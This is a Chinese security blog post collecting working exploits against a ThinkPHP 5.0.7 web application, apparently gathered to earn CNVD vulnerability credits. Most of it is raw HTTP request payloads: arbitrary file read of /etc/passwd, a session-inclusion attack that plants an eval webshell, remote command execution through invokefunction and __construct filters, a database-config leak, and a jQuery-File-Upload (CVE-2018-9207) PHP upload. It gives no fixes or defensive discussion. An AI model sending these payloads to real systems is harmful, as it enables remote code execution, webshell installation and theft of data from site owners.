框架漏洞(Thinkphp)

TP5框架漏洞原理不做赘述了 自行搜索。

瞅一眼源码 thinkphp_5.0.7 稳了,nday都会打吧(CNVD就是这么简单!但那你要问我源码哪里来的?当然是天上掉下来的)

thinkphp/base.php

TP5 任意文件读取 (CNVD+1)

url:

http://127.0.0.1/public/index.php/admin/pub/login.html?s=index/\think\Lang/load&file=/etc/passwd

TP5 session文件包含RCE (CNVD+1)

数据包:

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /public/index.php/admin/pub/login.html/index.php?s=captcha HTTP/1.1
Host:
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Cookie: PHPSESSID=qyctu23kyhoawqnvt1xdhyyob
Content-Length: 113

_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['c'])?>&server[]=1


1
2
3
4
5
6
7
8
9
10
11
POST /public/index.php/admin/pub/login.html/index.php?s=captcha HTTP/1.1
Host:
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Cookie: PHPSESSID=qyctu23kyhoawqnvt1xdhyyoq
Content-Length: 113

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/tmp/sess_qyctu23kyhoawqnvt1xdhyyob&c=phpinfo();

TP5 invokefunction 命令执行(重复)

数据包:

1
2
3
4
5
6
7
GET /public/index.php/admin/pub/login.html/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59
Cache-Control: no-cache
Pragma: no-cache

TP5 construct 命令执行(CNVD+1)

数据包:

1
2
3
4
5
6
7
8
9
10
POST /public/index.php/admin/pub/login.html/index.php?s=index/index/index HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 56

s=whoami&_method=__construct&method=POST&filter[]=system

TP5 信息泄露(CNVD+1)

url:

http://127.0.0.1/public/index.php/admin/pub/login.html?s=index/think\config/get&name=database.username

组件漏洞

jQuery-File-Upload 任意文件上传(重复)

翻看源码发现jQuery-File-Upload组件

CVE-2018-9207

http://127.0.0.1/public/static/admin/lib/jQuery-File-Upload/

数据包:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
POST /public/static/admin/lib/jQuery-File-Upload/server/php/ HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryURbQ6ukomAO4BxJo
User-Agent: Mozilla/5.0(Macintosh;IntelMacOSX10_15_7)AppleWebKit/537.36(KHTML,likeGecko)Chrome/132.0.0.0Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: application/json,text/javascript,*/*;q=0.01
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 202

------WebKitFormBoundaryURbQ6ukomAO4BxJo
Content-Disposition: form-data;name="files[]";filename="cnvd.php"
Content-Type: text/php

<?php phpinfo(); ?>
------WebKitFormBoundaryURbQ6ukomAO4BxJo--

http://127.0.0.1/public/static/admin/lib/jQuery-File-Upload/server/php/files/cnvd.php

成果展示

此处为语雀卡片,点击链接查看


本站总访问量

本站由 076w 使用 Stellar 1.33.1 主题创建。
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。